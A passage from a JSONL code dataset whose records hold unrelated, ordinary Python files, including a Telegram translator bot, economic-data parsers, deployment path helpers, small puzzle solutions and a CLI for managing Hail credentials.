collection_id=DISCOVERY_COLLECTION_ID,\n        file=text_io, filename=filename).get_result()\n\n    print(json.dumps(add_doc, indent=2))\n\n\n","sub_path":"server/routes/crawlme.py","file_name":"crawlme.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"522045405","text":"from googletrans import Translator\n\nimport telegram\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler\n\n\ndef start(bot, update):\n    bot.send_message(chat_id=update.message.chat_id, text=\"Hi! I am a translator bot.\")\n\n\ndef trad(bot, update):\n    translator = Translator()\n    miss_orig = update.message.text[6:]  # strip the leading \"/trad \" from the message\n    miss_trad = translator.translate(miss_orig).text\n    bot.send_message(chat_id=update.message.chat_id, text=miss_trad)\n\n\nTOKEN = open('token.txt').read().strip()\nupdater = Updater(token=TOKEN)\ndispatcher = updater.dispatcher\n\ndispatcher.add_handler(CommandHandler('start', start))\ndispatcher.add_handler(CommandHandler('trad', trad))\n\nupdater.start_polling()\n","sub_path":"bot-trad.py","file_name":"bot-trad.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"338338853","text":"\"\"\"Parser interfaces.\"\"\"\n\nimport json\n\nfrom parsers.helpers import DateHelper, Markdown, interpret_frequency\n\n# individual parser functions\nimport parsers.getter.brent as brent\nimport parsers.getter.cbr_fx as cbr_fx\nimport parsers.getter.kep as kep\nimport parsers.getter.ust as ust\n\n\nclass ParserBase:\n    def __repr__(self):\n        start = DateHelper.as_string(self.start)\n        return f'{self.__class__.__name__}(\\'{start}\\')'\n\n    @classmethod\n    def as_markdown(cls):\n        url_str = Markdown.short_link(cls.source_url)\n        freq_str = interpret_frequency(cls.freq)\n        varname_str = \", \".join(cls.all_varnames)\n\n        rows = [(\"Parser\", cls.__name__),\n                (\"Description\", cls.__doc__ or ''),\n                (\"URL\", url_str or ''),\n                (\"Frequency\", freq_str),\n                (\"Variables\", varname_str or ''),\n                (\"Code\", url_str or '')]\n        return Markdown.table(rows)\n\n\nclass RosstatKEP_Base(ParserBase):\n    \"\"\"Sections of Rosstat Short-term economic indicators ('KEP') publication.\"\"\"\n    observation_start_date = DateHelper.make_date('1999-01-31')\n    source_url = (\"http://www.gks.ru/wps/wcm/connect/\"\n                  \"rosstat_main/rosstat/ru/statistics/\"\n                  \"publications/catalog/doc_1140080765391\")\n    all_varnames = ['CPI', 'GDP', 'etc']\n\n    def __init__(self, start=None):\n        if start is None:\n            self.start = self.observation_start_date\n        else:\n            self.start = DateHelper.make_date(start)\n\n    def sample(self):\n        yield {\"date\": \"2015-11-30\", \"freq\": self.freq, \"name\": \"CPI_rog\", \"value\": 100.8}\n        yield {\"date\": \"2015-11-30\", \"freq\": self.freq, \"name\": \"RUR_EUR_eop\", \"value\": 70.39}\n        yield {\"date\": \"2015-12-31\", \"freq\": self.freq, \"name\": \"CPI_rog\", \"value\": 100.8}\n        yield {\"date\": \"2015-12-31\", \"freq\": self.freq, \"name\": \"RUR_EUR_eop\", \"value\": 79.7}\n\n    def yield_dicts(self):\n        return kep.yield_kep_dicts(self.freq)\n\n\nclass RosstatKEP_Monthly(RosstatKEP_Base):\n    \"\"\"Monthly indicators from Rosstat 'KEP' publication\"\"\"\n    freq = 'm'\n\n\nclass RosstatKEP_Quarterly(RosstatKEP_Base):\n    \"\"\"Quarterly indicators from Rosstat 'KEP' publication\"\"\"\n    freq = 'q'\n\n\nclass RosstatKEP_Annual(RosstatKEP_Base):\n    \"\"\"Annual indicators from Rosstat 'KEP' publication\"\"\"\n    freq = 'a'\n\n\nclass CBR_USD(ParserBase):\n    \"\"\"Bank of Russia official USD to RUB exchange rate\"\"\"\n    freq = 'd'\n    observation_start_date = DateHelper.make_date('1992-01-01') # '1991-07-01'\n    source_url = \"http://www.cbr.ru/scripts/Root.asp?PrtId=SXML\"\n    all_varnames = ['USDRUR_CB']\n\n    def __init__(self, start=None):\n        if start is None:\n            self.start = self.observation_start_date\n        else:\n            self.start = DateHelper.make_date(start)\n        self.end = DateHelper.today()\n\n    def yield_dicts(self):\n        return cbr_fx.get_cbr_er(self.start, self.end)\n\n    def sample(self):\n        
\"\"\"Yields dictionaries with sample datapoints.\"\"\"\n return iter([{'date': '2017-09-15', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.7706},\n {'date': '2017-09-16', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.5336},\n {'date': '2017-09-19', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.6242},\n {'date': '2017-09-20', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 58.0993},\n {'date': '2017-09-21', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 58.129},\n {'date': '2017-09-22', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 58.2242},\n {'date': '2017-09-23', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.6527},\n {'date': '2017-09-26', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.566}])\n\n\nclass BrentEIA(ParserBase):\n \"\"\"Brent oil price from US EIA\"\"\"\n freq = 'd'\n observation_start_date = DateHelper.make_date('1987-05-15')\n source_url = \"https://www.eia.gov/opendata/qb.php?category=241335\"\n all_varnames = ['BRENT']\n\n def __init__(self, start=None):\n if start is None:\n self.start = self.observation_start_date\n else:\n self.start = DateHelper.make_date(start)\n\n def yield_dicts(self):\n for p in brent.yield_brent_dicts():\n if DateHelper.make_date(p['date']) >= self.start:\n yield p\n\n def sample(self):\n \"\"\"Yield a few dictionaries with datapoints.\"\"\"\n return iter([{'date': '2017-09-18', 'freq': 'd', 'name': 'BRENT', 'value': 55.5},\n {'date': '2017-09-15', 'freq': 'd', 'name': 'BRENT', 'value': 56.18},\n {'date': '2017-09-14', 'freq': 'd', 'name': 'BRENT', 'value': 56.76},\n {'date': '2017-09-13', 'freq': 'd', 'name': 'BRENT', 'value': 55.52},\n {'date': '2017-09-12', 'freq': 'd', 'name': 'BRENT', 'value': 55.06},\n {'date': '2017-09-11', 'freq': 'd', 'name': 'BRENT', 'value': 54.2}]\n )\n# TODO:\n# class USTbonds(ParserBase):\n# \"\"\"Brent oil price from US EIA\"\"\"\n# freq = 'd'\n# observation_start_date = DateHelper.make_date('1987-05-15')\n# source_url = \"https://www.eia.gov/opendata/qb.php?category=241335\"\n# all_varnames = ['BRENT']\n#\n# def __init__(self, start=None):\n# if start is None:\n# self.start = self.observation_start_date\n# else:\n# self.start = DateHelper.make_date(start)\n#\n# def yield_dicts(self):\n# for p in brent.yield_brent_dicts():\n# if DateHelper.make_date(p['date']) >= self.start:\n# yield p\n#\n# def sample(self):\n# \"\"\"Yield a few dictionaries with datapoints.\"\"\"\n# return iter([{'date': '2017-09-18', 'freq': 'd', 'name': 'BRENT', 'value': 55.5},\n# {'date': '2017-09-15', 'freq': 'd', 'name': 'BRENT', 'value': 56.18},\n# {'date': '2017-09-14', 'freq': 'd', 'name': 'BRENT', 'value': 56.76},\n# {'date': '2017-09-13', 'freq': 'd', 'name': 'BRENT', 'value': 55.52},\n# {'date': '2017-09-12', 'freq': 'd', 'name': 'BRENT', 'value': 55.06},\n# {'date': '2017-09-11', 'freq': 'd', 'name': 'BRENT', 'value': 54.2}]\n# )\n\n\nclass Dataset:\n \"\"\"Operations related to all parsers.\"\"\"\n\n parsers = [RosstatKEP_Monthly,\n RosstatKEP_Quarterly,\n RosstatKEP_Annual,\n CBR_USD,\n BrentEIA,\n # USTbonds\n ]\n\n def get_sample():\n return [d for parser in Dataset.parsers\n for d in parser().sample()]\n\n def yield_dicts(start=None):\n for parser in Dataset.parsers:\n for datapoint in parser(start).yield_dicts():\n yield datapoint\n\n def as_markdown():\n tables = [cls.as_markdown() for cls in Dataset.parsers]\n return '\\n\\n'.join(tables)\n\n def serialize(filename='dataset.json'):\n def to_float(d):\n d['value'] = float(d['value'])\n return d\n gen = map(to_float, Dataset.yield_dicts())\n with open(filename, 'w') as f:\n 
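# values were coerced to float by to_float() above, so the dump is\n            # uniformly numeric JSON\n            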
json.dump(list(gen), f)\n\n\nif __name__ == \"__main__\":\n    from pprint import pprint\n    print('Sample dataset:')\n    pprint(Dataset.get_sample())\n\n    print('\\nMarkdown descriptions:')\n    print(Dataset.as_markdown())\n\n    fx = CBR_USD('2017-09-01').yield_dicts()\n    oil = BrentEIA('2017-09-01').yield_dicts()\n    kep_m = RosstatKEP_Monthly('2017-06').yield_dicts()\n\n    # this generator seeds the database\n    gen = Dataset.yield_dicts()\n\n    Dataset.serialize()\n","sub_path":"parsers/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"95785441","text":"from typing import Tuple\n\nclass Solution:\n    def complexNumberMultiply(self, num1: str, num2: str) -> str:\n        \n        def parse_complex(s: str) -> Tuple[int,int]:\n            sp = s.split('+')\n            assert len(sp) == 2\n            real = int(sp[0])\n            img = int(sp[1][:-1])\n            return real, img\n        \n        r1, i1 = parse_complex(num1)\n        r2, i2 = parse_complex(num2)\n        \n        rr = r1*r2 - i1*i2\n        ir = r1*i2 + i1*r2\n        return f'{rr}+{ir}i'\n","sub_path":"Practice-2021/August/Python3/complex_number_multiplication.py","file_name":"complex_number_multiplication.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"266768904","text":"# -*- encoding:utf8 -*-\nimport posixpath\nimport os\nfrom fabric.api import env, cd, require, abort\n\n\n## Utils ####################\n\ndef join_paths(a, *p):\n    \"\"\"\n    Joins multiple paths and ensures that the '/' is removed from the end.\n\n    Any path in *p that starts with / will have the '/' removed.\n\n    \"\"\"\n    p = map(lambda i: i.lstrip('/'), p)\n    return posixpath.join(a, *p).rstrip('/')\n\n\n## Known paths ##############\n\ndef deploy_path(sub_path=None):\n    \"\"\"\n    Deployment root path, the root of the deployment structure.\n\n    :param sub_path: A path below the package path.\n\n    \"\"\"\n    require('project_name')\n    deploy_path_root = env.get('deploy_path_root', '/opt/webapps')\n    return join_paths(deploy_path_root, env.project_name,\n                      sub_path if sub_path else '')\n\n\ndef package_path(revision=None, sub_path=None):\n    \"\"\"\n    Package path, the path where the python application package is deployed to.\n\n    Uses a number of fall-backs to get the current path.\n\n    :param revision: A specific revision name.\n    :param sub_path: A path below the package path.\n\n    \"\"\"\n    if not revision:\n        revision = env.get('revision', 'current')\n    return deploy_path(join_paths('app', revision,\n                                  sub_path if sub_path else ''))\n\n\ndef log_path():\n    \"\"\"\n    Path where log files are located.\n\n    \"\"\"\n    require('project_name', 'package_name')\n    log_path_root = env.get('log_path_root', '/var/log/webapps')\n    return join_paths(log_path_root, env.project_name, env.package_name)\n\n\ndef wsgi_socket_path():\n    \"\"\"\n    Path of WSGI socket, this is used to connect web-server to application.\n\n    \"\"\"\n    return deploy_path('var/wsgi.sock')\n\n\ndef remote_config_file(base_path, name_prefix=None, extension='.conf'):\n    \"\"\"\n    Determine the correct remote config file path.\n\n    :param base_path: location of the config file on remote file system.\n    :param name_prefix: an optional prefix for the configuration file name.\n    :param extension: file extension of config files.\n\n    \"\"\"\n    require('project_name')\n    path_elements = {\n        'name': env.project_name,\n        'prefix': name_prefix,\n        'ext': extension,\n    }\n    if name_prefix:\n        return join_paths(base_path, '%(prefix)s-%(name)s%(ext)s' 
% path_elements)\n    else:\n        return join_paths(base_path, '%(name)s%(ext)s' % path_elements)\n\n\n## Local paths ##############\n\ndef join_local_paths(a, *p):\n    \"\"\"\n    Joins multiple paths and ensures that there is no path separator on the\n    end.\n\n    Any path in *p that starts with a separator will have the separator\n    removed.\n\n    \"\"\"\n    p = map(lambda i: i.lstrip(os.path.sep), p)\n    return os.path.normpath(os.path.join(a, *p).rstrip(os.path.sep))\n\n\ndef local_path(sub_path=None):\n    \"\"\"\n    Local path relative to current fabfile.\n\n    :param sub_path: local sub path relative to current fabfile.\n\n    \"\"\"\n    require('real_fabfile')\n    fabfile_path = os.path.dirname(env.real_fabfile)\n    return join_local_paths(fabfile_path, sub_path if sub_path else '')\n\n\ndef local_working_path(sub_path=None, file_name=None, ensure_exists=True):\n    \"\"\"\n    Path to a local working path.\n\n    This path can be changed from the default `den` via the fabric environment\n    parameter `working_path`.\n\n    :param sub_path: sub path within working directory.\n    :param file_name: optional file name within directory (this is a separate\n        option to allow the `ensure_exists` flag to work correctly).\n    :param ensure_exists: ensures that the path exists.\n\n    \"\"\"\n    path = local_path(env.get('working_path', 'den'))\n    if sub_path:\n        path = join_local_paths(path, sub_path)\n    if ensure_exists and not os.path.exists(path):\n        os.makedirs(path)\n\n    if file_name:\n        return join_local_paths(path, file_name)\n    else:\n        return path\n\n\ndef local_config_file_options(service_name, name_prefix=None,\n                              extension='.conf'):\n    \"\"\"\n    Local names of a service config file with fallbacks.\n\n    Will return the name as well as optional fallback names for environment\n    specific configuration.\n\n    :param service_name: name of the service the configuration file is for.\n    :param name_prefix: an optional prefix for the configuration file name.\n    :param extension: file extension of config files.\n\n    Names of config files follow the following convention:\n\n    [\n        FABFILE_PATH/conf/SERVICE_NAME/ENVIRONMENT.EXTENSION,\n        FABFILE_PATH/conf/SERVICE_NAME.EXTENSION,\n    ]\n\n    or with a prefix:\n\n    [\n        FABFILE_PATH/conf/SERVICE_NAME/PREFIX-ENVIRONMENT.EXTENSION\n        FABFILE_PATH/conf/SERVICE_NAME/ENVIRONMENT.EXTENSION,\n        FABFILE_PATH/conf/PREFIX-SERVICE_NAME.EXTENSION,\n        FABFILE_PATH/conf/SERVICE_NAME.EXTENSION,\n    ]\n\n    \"\"\"\n    require('deploy_env')\n    path_elements = {\n        'name': service_name,\n        'prefix': name_prefix,\n        'env': env.deploy_env,\n        'ext': extension,\n    }\n    if name_prefix:\n        return [\n            local_path('conf/%(name)s/%(prefix)s-%(env)s%(ext)s' % path_elements),\n            local_path('conf/%(name)s/%(env)s%(ext)s' % path_elements),\n            local_path('conf/%(prefix)s-%(name)s%(ext)s' % path_elements),\n            local_path('conf/%(name)s%(ext)s' % path_elements),\n        ]\n    else:\n        return [\n            local_path('conf/%(name)s/%(env)s%(ext)s' % path_elements),\n            local_path('conf/%(name)s%(ext)s' % path_elements),\n        ]\n\n\ndef local_config_file(service_name, name_prefix=None, abort_if_not_found=True,\n                      extension='.conf'):\n    \"\"\"\n    Determine the correct local config file, this method will try several\n    options as resolved by `local_config_file_options` and return the path to\n    the first matching file that exists on disk.\n\n    :param service_name: name of the service the configuration file is for.\n    :param name_prefix: an optional prefix for the configuration file name.\n    :param abort_if_not_found: abort fabric operation if the requested file\n        could not be found.\n    :param extension: file 
extension of config files.\n\n \"\"\"\n file_options = local_config_file_options(service_name, name_prefix, extension)\n for file_option in file_options:\n if os.path.exists(file_option):\n return file_option\n if abort_if_not_found:\n abort(\"\"\"\nNot able to find a configuration file for service \"%s\".\n\nSearched path(s): %s\n\"\"\" % (service_name, file_options))\n\n\n## Context managers #########\n\ndef cd_deploy(*args, **kwargs):\n \"\"\"\n Context manager to change to the deploy path.\n\n :sub_path: A path below the package path.\n\n \"\"\"\n return cd(deploy_path(*args, **kwargs))\n\n\ndef cd_package(*args, **kwargs):\n \"\"\"\n Context manager to change to a package path.\n\n :revision: Name of revision; default is *env.revision* or *current*.\n :sub_path: A path within the package.\n\n \"\"\"\n return cd(package_path(*args, **kwargs))\n","sub_path":"denim/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"332664916","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom builtins import input\nfrom builtins import range\nimport numpy\nimport sys\nimport pmagpy.pmag as pmag\n\ndef main():\n \"\"\"\n NAME\n di_geo.py\n\n DESCRIPTION\n rotates specimen coordinate dec, inc data to geographic\n coordinates using the azimuth and plunge of the X direction\n\n INPUT FORMAT\n declination inclination azimuth plunge\n\n SYNTAX\n di_geo.py [-h][-i][-f FILE] [< filename ]\n\n OPTIONS\n -h prints help message and quits\n -i for interactive data entry\n -f FILE command line entry of file name\n -F OFILE, specify output file, default is standard output\n OUTPUT:\n declination inclination\n \"\"\"\n if '-h' in sys.argv:\n print(main.__doc__)\n sys.exit()\n if '-F' in sys.argv:\n ind=sys.argv.index('-F')\n ofile=sys.argv[ind+1]\n out=open(ofile,'w')\n print(ofile, ' opened for output')\n else: ofile=\"\"\n\n if '-i' in sys.argv: # interactive flag\n while 1:\n try:\n Dec=float(input(\"Declination: to quit \"))\n except EOFError:\n print(\"\\n Good-bye\\n\")\n sys.exit()\n Inc=float(input(\"Inclination: \"))\n Az=float(input(\"Azimuth: \"))\n Pl=float(input(\"Plunge: \"))\n print('%7.1f %7.1f'%(pmag.dogeo(Dec,Inc,Az,Pl)))\n elif '-f' in sys.argv:\n ind=sys.argv.index('-f')\n file=sys.argv[ind+1]\n data=numpy.loadtxt(file)\n else:\n data=numpy.loadtxt(sys.stdin,dtype=numpy.float) # read in the data from the datafile\n D,I=pmag.dogeo_V(data)\n for k in range(len(D)):\n if ofile==\"\":\n print('%7.1f %7.1f'%(D[k],I[k]))\n else:\n out.write('%7.1f %7.1f\\n'%(D[k],I[k]))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"programs/di_geo.py","file_name":"di_geo.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"20414824","text":"from .version import version\n\n_CONTEXT_HIGH_PRIORITY = \"0Level\"\n_CONTEXT_INLINESCRIPT = \"InlineScript\"\n_CONTEXT_VOCABULARY = \"Vocabulary\"\n_CONTEXT_NAMES = \"Names\"\n_CONTEXT_CHOICE = \"Choice\"\n_CONTEXT_DIALOGUE = \"Dialogue\"\n_CONTEXT_DESCRIPTION = \"Description\"\n_CONTEXT_SYSTEM = \"System\"\n_CONTEXT_MV = \"MV\"\n_CONTEXT_V2 = \"RPGMakerV2\"\n_CONTEXT_GAME_TITLE = \"GameTitle\"\n_CONTEXT_NOT_FOUND = \"OtherText\"\n\ncontextNames = [_CONTEXT_HIGH_PRIORITY, _CONTEXT_NOT_FOUND, _CONTEXT_GAME_TITLE, _CONTEXT_V2, _CONTEXT_MV, _CONTEXT_SYSTEM,\n _CONTEXT_DESCRIPTION, _CONTEXT_DIALOGUE, _CONTEXT_CHOICE, _CONTEXT_NAMES, 
_CONTEXT_VOCABULARY, _CONTEXT_INLINESCRIPT]\n\nclass TranslationDictionary (object):\n def __init__(self, dictDict):\n self.dicts = dictDict\n\n def addMachineTranslation (self, context, originalSentence, translatedSentence):\n contextedDict = self.dicts[context]\n contextedDict[originalSentence] = translatedSentence + machineTranslatorTag()\n\n def addGoogleTranslation (self, context, originalSentence, translatedSentence):\n contextedDict = self.dicts[context]\n contextedDict[originalSentence] = translatedSentence\n\n def hasTranslation (self, context, originalSentence):\n # Checks context dictionary for originalSentence, returns boolean regarding it being found\n if originalSentence in self.dicts['0Level']:\n trans = self.dicts['0Level'][originalSentence]\n if not isMachineTranslation(trans) or isCurrentMachineTranslation(trans):\n return True\n if originalSentence in self.dicts[context]:\n trans = self.dicts[context][originalSentence]\n if not isMachineTranslation(trans) or isCurrentMachineTranslation(trans):\n return True\n return False\n\n def getTranslation (self, context, originalSentence):\n # Returns dictionary translation for originalSentence in context\n if originalSentence in self.dicts['0Level']:\n trans = self.dicts['0Level'][originalSentence]\n else:\n trans = self.dicts[context][originalSentence]\n if not isMachineTranslation(trans):\n return trans\n if isCurrentMachineTranslation(trans):\n index = trans.find(machineTranslatorTag())\n return trans[:index]\n\ndef machineTranslatorTag ():\n # Returns a full tag to be added to machine translated dictionary entries\n return \"*MechaTranslator V\" + version + \"*\"\n\ndef isMachineTranslation (text):\n # Returns boolean regarding text being an machine translated entry\n return text.find(\"*MechaTranslator V\") != -1\n\ndef isCurrentMachineTranslation (text):\n # Returns boolean regarding text being an up to date machine translated entry\n return text.find(machineTranslatorTag()) != -1","sub_path":"lib/classes/TranslationDictionary.py","file_name":"TranslationDictionary.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56828292","text":"import textwrap\n\n\ndef get_test_input() -> str:\n return textwrap.dedent(\"\"\"\\\n forward 5\n down 5\n forward 8\n up 3\n down 8\n forward 2\"\"\")\n\n\ndef read_input(day_number, test=False):\n if test:\n return parse_input(get_test_input())\n else:\n filename = 'input/day{}.txt'.format(day_number)\n with open(filename, 'r') as file:\n return parse_input(file.read())\n\n\ndef parse_input(s: str):\n data = []\n for line in s.splitlines():\n data.append(line.split())\n return data\n\n\ndef part_1(data):\n x = 0\n z = 0\n for direction, dist in data:\n if direction == 'forward':\n x += int(dist)\n elif direction == 'up':\n z -= int(dist)\n if z < 0:\n print(\"unexpected\")\n elif direction == 'down':\n z += int(dist)\n\n print(f'Part 1: {x*z}')\n\n\ndef part_2(data):\n x = 0\n depth = 0\n aim = 0\n for direction, dist in data:\n if direction == 'forward':\n x += int(dist)\n depth += aim*int(dist)\n elif direction == 'up':\n aim -= int(dist)\n elif direction == 'down':\n aim += int(dist)\n\n print(f'Part 2: {x*depth}')\n\n\ndef main():\n data = read_input(day_number=2, test=False)\n part_1(data)\n part_2(data)\n\n\nif __name__ == \"__main__\":\n 
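# with test=True inside main(), the bundled sample input should give\n    # 150 for part 1 and 900 for part 2\n    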
main()\n","sub_path":"2021/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"306201724","text":"import re\nimport os\nimport requests\nimport json\nfrom totalimpactwebapp import product\nfrom totalimpactwebapp import heading_product\nfrom flask import g\n\n\n\n\n\ndef prep(products_dict, include_headings=False):\n\n prepped_products = []\n\n for product_dict in products_dict:\n\n try:\n prepped_products.append(product.prep_product(product_dict))\n except product.GenreDeprecatedError:\n pass\n\n if include_headings:\n prepped_products += make_heading_products(prepped_products)\n #prepped_products = remove_account_products(prepped_products)\n\n return prepped_products\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nCategory Heading stuff\n\"\"\"\n\ndef make_heading_products(products):\n\n categories = categorize_products(products)\n\n heading_products_list = []\n\n for category_key, category_products in categories.iteritems():\n\n my_heading_product = heading_product.make_for_category(\n category_key[0], # genre\n category_key[1], # account\n category_products\n )\n\n heading_products_list.append(my_heading_product)\n\n return heading_products_list\n\n\n\ndef remove_account_products(products):\n ret = []\n for product in products:\n\n try:\n if not product['biblio']['is_account']:\n ret.append(product)\n except KeyError:\n ret.append(product)\n\n return ret\n\n\ndef categorize_products(products):\n categories = {}\n for product in products:\n genre = product[\"biblio\"][\"genre\"]\n try:\n account = product[\"biblio\"][\"account\"].lower()\n except KeyError:\n account = None\n\n\n categories.setdefault((genre, account), []).append(product)\n\n return categories\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nduplicates stuff\n\"\"\"\n\n\n\ndef get_duplicates_list_from_tiids(tiids):\n if not tiids:\n return []\n\n query = u\"{core_api_root}/v1/products/duplicates?api_admin_key={api_admin_key}\".format(\n core_api_root=g.api_root,\n api_admin_key=os.getenv(\"API_ADMIN_KEY\")\n )\n\n r = requests.post(query,\n data=json.dumps({\n \"tiids\": tiids\n }),\n headers={'Content-type': 'application/json', 'Accept': 'application/json'})\n\n return r.json()[\"duplicates_list\"]\n\n\n\n\n\n","sub_path":"totalimpactwebapp/products_list.py","file_name":"products_list.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"413779541","text":"\n\n#calss header\nclass _HEAL():\n\tdef __init__(self,): \n\t\tself.name = \"HEAL\"\n\t\tself.definitions = [u'to make or become well again, especially after a cut or other injury: ', u'If a bad situation or painful emotion heals, it ends or improves, and if something heals it, it makes it end or improve: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_heal.py","file_name":"_heal.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"95377499","text":"import argparse\nimport logging as logger\nimport os.path\nimport sys\n\nfrom inspect import getsourcefile\n\ncurrent_path = os.path.abspath(getsourcefile(lambda: 0))\ncurrent_dir = os.path.dirname(current_path)\nparent_dir = 
current_dir[:current_dir.rfind(os.path.sep)]\n\nsys.path.insert(0, parent_dir)\n\nfrom lib.trie_tree import TrieTree\nfrom lib.word_search import Boggle\nfrom lib.data_logging import data_logging\n\n\ndef load_dictionary(tree, filepath):\n \"\"\"\n Loads a dictionary file into Boggle object's word list\n :param: tree: prefix tree object\n :param name: Path to the dictionary file\n :return: None\n \"\"\"\n try:\n with open(filepath) as f:\n for line in f:\n word = line.rstrip().upper()\n tree.insert_word(word)\n except IOError:\n raise Exception('Please enter a valid filename.')\n\n\ndef main(size, filepath):\n boggle = Boggle(size=int(size))\n tree = TrieTree()\n load_dictionary(tree, filepath)\n found = set()\n boggle.find_words(tree, found)\n for word in sorted(found):\n logger.info(word)\n logger.info(boggle)\n\n\nif __name__ == '__main__':\n default_dict_path = os.path.join(parent_dir, 'conf', 'words.txt')\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', \"--size\", type=int, default=4,\n action='store', help=\"Board size\")\n parser.add_argument('-p', \"--filepath\", default=default_dict_path,\n action='store', help=\"Path of words.txt file\")\n\n args = parser.parse_args()\n data_logging()\n main(args.size, args.filepath)\n","sub_path":"word_puzzle/workflow/puzzle_solver.py","file_name":"puzzle_solver.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"392044614","text":"import sys\nimport argparse\n\nfrom . import login\nfrom . import logout\nfrom . import auth_list\nfrom . import copy_paste_login\n\n\ndef parser():\n main_parser = argparse.ArgumentParser(\n prog='hailctl auth',\n description='Manage Hail credentials.')\n subparsers = main_parser.add_subparsers()\n\n login_parser = subparsers.add_parser(\n 'login',\n help='Obtain Hail credentials.',\n description='Obtain Hail credentials.')\n copy_paste_login_parser = subparsers.add_parser(\n 'copy-paste-login',\n help='Obtain Hail credentials with a copy paste token.',\n description='Obtain Hail credentials with a copy paste token.')\n logout_parser = subparsers.add_parser(\n 'logout',\n help='Revoke Hail credentials.',\n description='Revoke Hail credentials.')\n list_parser = subparsers.add_parser(\n 'list',\n help='List Hail credentials.',\n description='List Hail credentials.')\n\n login_parser.set_defaults(module='login')\n login.init_parser(login_parser)\n\n copy_paste_login_parser.set_defaults(module='copy-paste-login')\n copy_paste_login.init_parser(copy_paste_login_parser)\n\n logout_parser.set_defaults(module='logout')\n logout.init_parser(logout_parser)\n\n list_parser.set_defaults(module='list')\n auth_list.init_parser(list_parser)\n\n return main_parser\n\n\ndef main(args):\n if not args:\n parser().print_help()\n sys.exit(0)\n jmp = {\n 'login': login,\n 'copy-paste-login': copy_paste_login,\n 'logout': logout,\n 'list': auth_list,\n }\n\n args, pass_through_args = parser().parse_known_args(args=args)\n jmp[args.module].main(args, pass_through_args)\n","sub_path":"hail/python/hailtop/hailctl/auth/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504107851","text":"\"\"\"\n17.\t Altere o programa de cálculo dos números primos, informando,\n caso o número não seja primo, por quais número ele é divisível.\n\"\"\"\nnum = int(input('Digite um numero: '))\ntot = 0\nfor c in 
range(1,num+1):\n if num % c == 0:\n tot+=1\nprint(f'Numero {num} foi divisível {tot} vezes.')\nif tot == 2:\n print('E por isso ele é PRIMO!')\nelse:\n for i in range(1, num + 1):\n if num % i == 0:\n print(f' {i}', end=' ')\n print('\\nE por isso ele NAO É PRIMO!')","sub_path":"Lista03/ex017.py","file_name":"ex017.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"47264016","text":"def dfs(graph, start_node, visit = None):\n if visit is None:\n visit = list()\n visit.append(start_node)\n for next in graph[start_node]:\n if next not in visit:\n dfs(graph, next, visit)\n return visit\n\ndef searchN(node, value):\n if value not in node:\n node.append(value)\n\ndef main():\n n, m = map(int, input().split())\n node = list(input().split())\n node_dic = {}\n for i in range(n):\n node_dic[node[i]] = []\n for _ in range(m):\n input_node = list(input().split())\n searchN(node_dic[input_node[0]], input_node[1])\n searchN(node_dic[input_node[1]], input_node[0])\n target = input()\n for i in range(len(node_dic)):\n node_dic[node[i]].sort()\n print(*dfs(node_dic, target))\n\nif __name__ == \"__main__\":\n main()","sub_path":"7주차_코테 (dfs)/prac3.py","file_name":"prac3.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"490013940","text":"import itertools\nimport collections\n\n\ndef apriori(data, support_ratio):\n \"\"\"\n Given a list of sets (data), discover subsets that occurs at a minimum percentage (support_ratio).\n Example:\n data: [{1, 2, 3, 4}, {1, 2, 3}, {1, 2}, {2, 3, 4}, {2, 3}, {3, 4}, {2, 4}]\n support_ratio: 0.42\n Returns:\n {(1,): 0.42857142857142855,\n (1, 2): 0.42857142857142855,\n (2,): 